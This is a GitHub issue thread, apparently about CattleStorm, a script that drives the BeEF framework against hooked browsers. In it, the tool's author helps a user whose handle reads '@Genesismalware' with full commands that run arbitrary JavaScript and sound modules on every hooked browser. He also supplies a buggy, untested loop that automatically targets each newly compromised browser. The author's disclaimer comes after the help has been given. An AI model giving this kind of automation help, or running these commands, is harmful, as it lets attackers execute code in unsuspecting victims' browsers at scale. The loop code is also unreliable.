Comments (8)
Hi Wandas, to loop, you can either go with a bash loop and execute the script multiple times.
python3 CattleStorm.py -u <user> -p <pass> --url https://<domain.com> -m "Play Sound" -mp "sound_file_uri=march.mp3" && python3 CattleStorm.py -u <user> -p <pass> --url https://<domain.com>-m "Raw JavaScript" -mp "cmd=your_javascript.js"
But if you want to filter new browsers, this would require you to implement a while loop in the script and adapt the hooked_browsers in the Python script to track browsers you already executed on before in a list and only run commands on the new browsers. You can implement something like the following (did not test):
from time import sleep
targeted_browsers = []
while True:
hooked_browsers = fetch_hooked_browsers(beef_api_url, auth_token)
target_browsers = []
for hooked_browser in hooked_browsers:
if hooked_browsers not in targeted_browsers:
target_browsers.append(hooked_browsers) # list to execute on this time
targeted_browsers.append(hooked_browsers) # append browser to avoid execution next time
run_module(module_id, target_browsers, params, beef_api_url, auth_token)
# sleep 30 seconds
sleep(30)
The easiest would be to implement something like above and call the python script twice in separate terminals. Otherwise, you can adapt the script further to include two run_module calls with different modules and parameters. In this case lines 120 to 138 should also be part of your loop.
It's up to you to be creative!
from cattlestorm.
Hi wandas,
I see two potential issues in your command.
- The --url parameter does not need /ui/panel. You should simply use http://yourdomain.com. The script will automatically connect to the correct endpoints.
- When using a module like Play Sound, you should check the code (https://github.com/beefproject/beef/blob/3286ef88f49163e02e7add46c0458b3570bb6fdb/modules/browser/play_sound/module.rb#L9) . This mentions it need the sound_file_uri parameter --> -m "Play Sound" -mp "sound_file_uri=http://xxx.xxx/sound.wav"
Try like this:
python3 CattleStorm.py -u faboo -p faboowand --url http://xxx.xxx.xxx.xxx:3000 -m "Play Sound" -mp "sound_file_uri=http://xxx.xxx.xxx.xxx/sound.wav"
from cattlestorm.
Hi wandas1212,
Could it be that you executed it without arguments? You should pass your beef login user, password and URL and then choose a module to execute with the appropriate parameters, e.g. the following command will read a raw javascript from disk and execute it on the zombie browsers:
python3 CattleStorm.py -u <beef-user> -p <beef-password> --url <beef-url> -m "Raw JavaScript" -mp "cmd=path/to/script.js"
from cattlestorm.
python3 CattleStorm.py -u faboo -p faboowand --url http://XXX.XXX.XXX.XXX:3000/ui/panel -m "Play Sound" -mp "http://XXX.XXX.XXX.XXX/sound.wav"
▄████▄ ▄▄▄ ▄▄▄█████▓▄▄▄█████▓ ██▓ ▓█████ ██████ ▄▄▄█████▓ ▒█████ ██▀███ ███▄ ▄███▓
▒██▀ ▀█ ▒████▄ ▓ ██▒ ▓▒▓ ██▒ ▓▒▓██▒ ▓█ ▀ ▒██ ▒ ▓ ██▒ ▓▒▒██▒ ██▒▓██ ▒ ██▒▓██▒▀█▀ ██▒
▒▓█ ▄ ▒██ ▀█▄ ▒ ▓██░ ▒░▒ ▓██░ ▒░▒██░ ▒███ ░ ▓██▄ ▒ ▓██░ ▒░▒██░ ██▒▓██ ░▄█ ▒▓██ ▓██░
▒▓▓▄ ▄██▒░██▄▄▄▄██░ ▓██▓ ░ ░ ▓██▓ ░ ▒██░ ▒▓█ ▄ ▒ ██▒░ ▓██▓ ░ ▒██ ██░▒██▀▀█▄ ▒██ ▒██
▒ ▓███▀ ░ ▓█ ▓██▒ ▒██▒ ░ ▒██▒ ░ ░██████▒░▒████▒▒██████▒▒ ▒██▒ ░ ░ ████▓▒░░██▓ ▒██▒▒██▒ ░██▒
░ ░▒ ▒ ░ ▒▒ ▓▒█░ ▒ ░░ ▒ ░░ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ▒░▒░▒░ ░ ▒▓ ░▒▓░░ ▒░ ░ ░
░ ▒ ▒ ▒▒ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░ ░ ░ ▒ ▒░ ░▒ ░ ▒░░ ░ ░
░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
[+] Feching token...
Traceback (most recent call last):
File "/home/wandas/Desktop/python/CattleStorm-main/CattleStorm.py", line 151, in
main()
File "/home/wandas/Desktop/python/CattleStorm-main/CattleStorm.py", line 116, in main
auth_token = fetch_token(args.username, args.password, beef_api_url)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/wandas/Desktop/python/CattleStorm-main/CattleStorm.py", line 52, in fetch_token
auth_token = json.loads(auth_response.content)["token"]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/json/init.py", line 346, in loads
return _default_decoder.decode(s)
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/json/decoder.py", line 337, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/json/decoder.py", line 355, in raw_decode
raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
┌──(wandas㉿kali11)-[~/Desktop/python/CattleStorm-main]
still getting the error above, can you help me out, i have been on this for couple of days now,
you can get in touch with me on telegram with the ID wandas1212 or email [email protected]
from cattlestorm.
it has worked very well, i am really grateful,
also i will be very happy if you could help me out on the following,
i want to achieve the following,
i want to loop the code forever so that once a new browser comes online, the command modules that i have set should run on them,
also i want to run more than 2 command modules.
thanks a lot,
WANDAS
from cattlestorm.
i am really grateful, and always happy whenever i see your message,
will like to get in touch with you,
will really appreciate it if you could text me on telegram with the ID @Genesismalware, or on [email protected],
really grateful.
WANDAS
from cattlestorm.
Please note that I do not approve or support malicious usage of my tools. This is meant for educational purposes and proof of concepts only.
from cattlestorm.
yup,
i get you, and i am also using it for education purposes only, i only scripts malwares as my project, i don't use them for any bad purposes,
the malware in my telegram ID is just to show that i only do malware, but i don't use them for any bad reasons,
from cattlestorm.
Related Issues (2)
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from cattlestorm.